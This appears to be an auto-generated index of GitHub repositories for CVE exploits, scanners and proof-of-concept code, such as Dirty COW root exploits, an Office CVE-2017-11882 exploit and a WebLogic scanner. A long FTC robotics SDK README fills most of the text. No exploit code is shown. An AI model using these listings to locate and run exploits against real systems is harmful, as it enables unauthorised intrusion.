**weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883** : [0xn0ne/weblogicScanner](https://api.github.com/repos/0xn0ne/weblogicScanner) create time: 2020-01-15T04:26:29Z

**None** : [ossf-cve-benchmark/CVE-2018-20164](https://api.github.com/repos/ossf-cve-benchmark/CVE-2018-20164) create time: 2020-12-01T08:06:11Z

**None** : [ossf-cve-benchmark/CVE-2016-10735](https://api.github.com/repos/ossf-cve-benchmark/CVE-2016-10735) create time: 2020-12-01T12:37:53Z

**None** : [ossf-cve-benchmark/CVE-2016-1000229](https://api.github.com/repos/ossf-cve-benchmark/CVE-2016-1000229) create time: 2020-12-01T12:37:53Z

**CVE-2017-11882(通杀Office 2003到2016)** : [littlebin404/CVE-2017-11882](https://api.github.com/repos/littlebin404/CVE-2017-11882) create time: 2019-08-14T11:55:00Z

**CTFs are fun, but what about exploiting a real bug?** : [mephi42/CVE-2016-8863](https://api.github.com/repos/mephi42/CVE-2016-8863) create time: 2020-12-24T02:02:27Z

**Exploiting the CVE-2016-10555** : [thepcn3rd/jwtToken-CVE-2016-10555](https://api.github.com/repos/thepcn3rd/jwtToken-CVE-2016-10555) create time: 2020-12-26T22:37:53Z

**Revisited CVE-2016-9795 privilege escalation (casrvc binary from CA Common Services suite)** : [blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited](https://api.github.com/repos/blogresponder/CA-Common-Services-privilege-escalation-cve-2016-9795-revisited) create time: 2020-12-29T21:07:09Z

**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://api.github.com/repos/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**Exploit the dirtycow vulnerability to login as root** : [zakariamaaraki/Dirty-COW-CVE-2016-5195-](https://api.github.com/repos/zakariamaaraki/Dirty-COW-CVE-2016-5195-) create time: 2019-11-26T01:18:41Z

**CVE-2016-4468** : [shanika04/cloudfoundry_uaa](https://api.github.com/repos/shanika04/cloudfoundry_uaa) create time: 2021-01-06T12:34:36Z

**CVE-2016-4999** : [shanika04/dashbuilder](https://api.github.com/repos/shanika04/dashbuilder) create time: 2021-01-06T13:02:50Z

**None** : [ubrito/poc_CVE-2016-6210](https://api.github.com/repos/ubrito/poc_CVE-2016-6210) create time: 2021-01-15T16:05:09Z

**CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android** : [timwr/CVE-2016-5195](https://api.github.com/repos/timwr/CVE-2016-5195) create time: 2016-10-21T11:19:21Z

**DirtyCOW Exploit for Android** : [DanielEbert/CVE-2016-5195](https://api.github.com/repos/DanielEbert/CVE-2016-5195) create time: 2020-12-20T19:17:10Z

**PoC for CVE-2016-1000027** : [artem-smotrakov/cve-2016-1000027-poc](https://api.github.com/repos/artem-smotrakov/cve-2016-1000027-poc) create time: 2021-02-01T19:46:51Z

**NOTICE This repository contains the public FTC SDK for the SKYSTONE (2019-2020) competition season. If you are looking for the current season's FTC SDK software, please visit the new and permanent home of the public FTC SDK: FtcRobotController repository Welcome! This GitHub repository contains the source code that is used to build an Android app to control a FIRST Tech Challenge competition robot. To use this SDK, download/clone the entire project to your local computer. Getting Started If you are new to robotics or new to the FIRST Tech Challenge, then you should consider reviewing the FTC Blocks Tutorial to get familiar with how to use the control system: FTC Blocks Online Tutorial Even if you are an advanced Java programmer, it is helpful to start with the FTC Blocks tutorial, and then migrate to the OnBot Java Tool or to Android Studio afterwards. Downloading the Project If you are an Android Studio programmer, there are several ways to download this repo. Note that if you use the Blocks or OnBot Java Tool to program your robot, then you do not need to download this repository. If you are a git user, you can clone the most current version of the repository: git clone https://github.com/FIRST-Tech-Challenge/SKYSTONE.git Or, if you prefer, you can use the "Download Zip" button available through the main repository page. Downloading the project as a .ZIP file will keep the size of the download manageable. You can also download the project folder (as a .zip or .tar.gz archive file) from the Downloads subsection of the Releases page for this repository. Once you have downloaded and uncompressed (if needed) your folder, you can use Android Studio to import the folder ("Import project (Eclipse ADT, Gradle, etc.)"). Getting Help User Documentation and Tutorials FIRST maintains online documentation with information and tutorials on how to use the FIRST Tech Challenge software and robot control system. You can access this documentation using the following link: SKYSTONE Online Documentation Note that the online documentation is an "evergreen" document that is constantly being updated and edited. It contains the most current information about the FIRST Tech Challenge software and control system. Javadoc Reference Material The Javadoc reference documentation for the FTC SDK is now available online. Click on the following link to view the FTC SDK Javadoc documentation as a live website: FTC Javadoc Documentation Documentation for the FTC SDK is also included with this repository. There is a subfolder called "doc" which contains several subfolders: The folder "apk" contains the .apk files for the FTC Driver Station and FTC Robot Controller apps. The folder "javadoc" contains the JavaDoc user documentation for the FTC SDK. Online User Forum For technical questions regarding the Control System or the FTC SDK, please visit the FTC Technology forum: FTC Technology Forum Release Information Version 5.5 (20200824-090813) Version 5.5 requires Android Studio 4.0 or later. New features Adds support for calling custom Java classes from Blocks OpModes (fixes SkyStone issue #161). Classes must be in the org.firstinspires.ftc.teamcode package. Methods must be public static and have no more than 21 parameters. Parameters declared as OpMode, LinearOpMode, Telemetry, and HardwareMap are supported and the argument is provided automatically, regardless of the order of the parameters. On the block, the sockets for those parameters are automatically filled in. Parameters declared as char or java.lang.Character will accept any block that returns text and will only use the first character in the text. Parameters declared as boolean or java.lang.Boolean will accept any block that returns boolean. Parameters declared as byte, java.lang.Byte, short, java.lang.Short, int, java.lang.Integer, long, or java.lang.Long, will accept any block that returns a number and will round that value to the nearest whole number. Parameters declared as float, java.lang.Float, double, java.lang.Double will accept any block that returns a number. Adds telemetry API method for setting display format Classic Monospace HTML (certain tags only) Adds blocks support for switching cameras. Adds Blocks support for TensorFlow Object Detection with a custom model. Adds support for uploading a custom TensorFlow Object Detection model in the Manage page, which is especially useful for Blocks and OnBotJava users. Shows new Control Hub blink codes when the WiFi band is switched using the Control Hub's button (only possible on Control Hub OS 1.1.2) Adds new warnings which can be disabled in the Advanced RC Settings Mismatched app versions warning Unnecessary 2.4 GHz WiFi usage warning REV Hub is running outdated firmware (older than version 1.8.2) Adds support for Sony PS4 gamepad, and reworks how gamepads work on the Driver Station Removes preference which sets gamepad type based on driver position. Replaced with menu which allows specifying type for gamepads with unknown VID and PID Attempts to auto-detect gamepad type based on USB VID and PID If gamepad VID and PID is not known, use type specified by user for that VID and PID If gamepad VID and PID is not known AND the user has not specified a type for that VID and PID, an educated guess is made about how to map the gamepad Driver Station will now attempt to automatically recover from a gamepad disconnecting, and re-assign it to the position it was assigned to when it dropped If only one gamepad is assigned and it drops: it can be recovered If two gamepads are assigned, and have different VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have different VID/PID signatures, and BOTH drop: both will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and only one drops: it will be recovered If two gamepads are assigned, and have the same VID/PID signatures, and BOTH drop: neither will be recovered, because of the ambiguity of the gamepads when they re-appear on the USB bus. There is currently one known edge case: if there are two gamepads with the same VID/PID signature plugged in, but only one is assigned, and they BOTH drop, it's a 50-50 chance of which one will be chosen for automatic recovery to the assigned position: it is determined by whichever one is re-enumerated first by the USB bus controller. Adds landscape user interface to Driver Station New feature: practice timer with audio cues New feature (Control Hub only): wireless network connection strength indicator (0-5 bars) New feature (Control Hub only): tapping on the ping/channel display will switch to an alternate display showing radio RX dBm and link speed (tap again to switch back) The layout will NOT autorotate. You can switch the layout from the Driver Station's settings menu. Breaking changes Removes support for Android versions 4.4 through 5.1 (KitKat and Lollipop). The minSdkVersion is now 23. Removes the deprecated LinearOpMode methods waitOneFullHardwareCycle() and waitForNextHardwareCycle() Enhancements Handles RS485 address of Control Hub automatically The Control Hub is automatically given a reserved address Existing configuration files will continue to work All addresses in the range of 1-10 are still available for Expansion Hubs The Control Hub light will now normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes 